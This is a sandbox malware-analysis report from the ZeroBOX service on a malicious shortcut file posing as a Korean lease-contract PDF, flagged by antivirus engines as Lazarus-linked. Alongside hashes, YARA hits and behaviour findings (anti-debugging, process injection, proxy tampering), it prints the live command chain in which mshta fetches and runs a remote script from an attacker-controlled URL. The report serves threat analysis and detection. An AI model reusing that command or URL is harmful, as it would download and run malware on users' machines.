Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
11.05 04:11
VST32License.exe
11.05 03:11
VST32License.exe
11.03 01:11
DocTromTinNhan.exe
11.01 06:11
MPDW-constraints.vbs
11.01 06:11
87f3f2.exe
11.01 06:11
Client-built.exe
11.01 06:11
norm.exe
11.01 06:11
chrome_131.exe
11.01 06:11
kjrhjijawdkrjhh.exe
11.01 09:11
Calibre_Installer.exe

Latest News
11.05 01:11
메가존클라우드-파이오링크, 클라우드 보안...
11.05 01:11
프로페셔널 헤어케어 브랜드 레삐, ‘20...
11.05 01:11
Chinese Group Accused ...
11.05 01:11
25년 정보보호 전자공시시스템 고도화 및...
11.05 01:11
KISA, 민원 응대 보호시스템 전사 확대
11.05 01:11
아늑샵, 2024년 4분기 '한국소비자인...
11.05 01:11
크라운슬립, 프리미엄 구스 이불 론칭 기...
11.05 01:11
Google Warns of Active...
11.05 12:11
안랩, 2024년 3분기 매출 685억,...
11.05 12:11
Southeast Asia’s Digit...

Summary | ZeroBOX

부동산 임대차 계약서.pdf.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 24, 2024, 9:56 a.m.	Oct. 24, 2024, 9:59 a.m.

Size	521.6KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=130, Archive, ctime=Sat Dec 7 00:09:39 2019, mtime=Wed Jul 19 00:29:04 2023, atime=Sat Dec 7 00:09:39 2019, length=14848, window=hide
MD5	`ac9ab7765b8127f1fbb633cd1209ebb6`
SHA256	`fd87fa2e1a6540e040b15fc81f851773d243e1c6ef0efe91e85e4d91da8acb22`
CRC32	`8A359277`
ssdeep	`12288:4VEz6+E8z0PnIlP2Nvi2gmz20ZXwlIK1b1lnAh+7m9UOnWeeASxB:1z6dHnXK5mbZAlI4/OjWeeLB`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ppqoUIsgrRpXrR" "C:\Users\test22\AppData\Local\Temp\부동산 임대차 계약서.pdf.lnk"
3032
- mshta.exe "C:\Windows\System32\mshta.exe" "http://olkimj.online/shiba/jegil/sungreen2.php"
  2208

Name	Response	Post-Analysis Lookup
olkimj.online		47.244.44.175

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 24, 2024, 9:56 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 24, 2024, 9:56 a.m.	process_identifier: 2208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74092000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Oct. 24, 2024, 9:56 a.m.	process_identifier: 2208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73b23000 process_handle: 0xffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\부동산 임대차 계약서.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\mshta.exe" "http://olkimj.online/shiba/jegil/sungreen2.php"

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 24, 2024, 9:57 a.m.	process_identifier: 2208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (8 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 24, 2024, 9:56 a.m.	key_handle: 0x000002d0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

CTX	lnk.trojan.generic
CAT-QuickHeal	LNK.APT.43736
ALYac	Trojan.Agent.LNK.Gen
VIPRE	Generic.DangerousPassword.Lazarus.D.E7F811BC
Arcabit	Generic.DangerousPassword.Lazarus.D.E7F811BC
VirIT	Trojan.LNK.Heur.A
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Generic.DangerousPassword.Lazarus.D.E7F811BC
MicroWorld-eScan	Generic.DangerousPassword.Lazarus.D.E7F811BC
Emsisoft	Generic.DangerousPassword.Lazarus.D.E7F811BC (B)
Sophos	Troj/DownLnk-X
FireEye	Generic.DangerousPassword.Lazarus.D.E7F811BC
Google	Detected
GData	Generic.DangerousPassword.Lazarus.D.E7F811BC
AhnLab-V3	Trojan/LNK.Agent.SC205549
VBA32	Trojan.Link.Crafted
Zoner	Probably Heur.LNKScript
alibabacloud	Trojan:Win/DangerousPassword.Ldwhmvf

Modifies proxy override settings possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 24, 2024, 9:56 a.m.	key_handle: 0x000002d0 regkey_r: ProxyOverride reg_type: 1 (REG_SZ) value: 127.0.0.1:16107; regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3032 resumed a thread in remote process 2208
NtResumeThread Oct. 24, 2024, 9:56 a.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 2208	1	0	0